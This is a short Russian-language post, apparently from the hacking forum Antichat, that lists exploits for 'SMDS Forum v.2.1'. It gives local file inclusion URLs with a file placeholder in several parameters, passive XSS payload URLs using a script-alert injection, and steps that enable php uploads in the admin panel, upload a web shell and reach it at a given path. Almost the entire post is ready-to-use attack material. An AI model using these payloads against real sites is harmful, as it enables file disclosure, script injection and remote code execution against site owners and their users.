14.06.2007, 17:59
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Форум: SMDS Forum
Версия: v.2.1 rus
Локальный инклуд:
Код:
http://site.ru/Files/all_forums.php?file_read_forums=[file]
Код:
http://site.ru/Files/write_log.php?file_read_logs=[file]
Код:
http://site.ru/Files/statistic.php?file_read_statistic=[file]
Код:
http://site.ru/Files/downloads.php?file_read_downl=[file]
http://site.ru/Files/downloads.php?file_add_downloads=[file]
Пассивные XSS:
Код:
http://site.ru/Files/buttons.php?forum_ext=1&language[but_index]=<script>alert();</script>
Код:
http://site.ru/Files/downloads.php?td_all=<script>alert();</script>
Код:
http://site.ru/Files/downloads.php?table_all=<script>alert();</script>
Код:
http://site.ru/Files/faq.php?vars[your_email]=<script>alert();</script>
Заливка шелла:
В админке, добавляем к разрешённым расширениям файлов php, закачиваем шелл, шелл будет доступен по адресу:
http://site.ru/Downloads/shell.php
|
|
|